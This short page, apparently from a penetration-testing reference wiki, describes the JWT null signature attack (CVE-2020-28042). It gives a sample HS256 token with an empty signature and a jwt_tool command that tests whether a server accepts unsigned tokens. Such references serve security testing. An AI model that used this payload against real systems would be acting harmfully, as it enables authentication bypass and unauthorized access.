search

Null Signature Attack (CVE-2020-28042)

Send a JWT with HS256 algorithm without a signature like eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.

hashtag
Using jwt_tool:

python3 jwt_tool.py [JWT_HERE] -X n
PreviousThe None AttackNextThe Algorithm Switch Attack / Algorithm confusion attacks

Last updated